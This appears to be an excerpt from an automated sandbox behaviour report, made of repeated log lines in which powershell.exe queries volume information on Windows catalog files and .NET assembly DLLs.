Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation	Jump to behavior
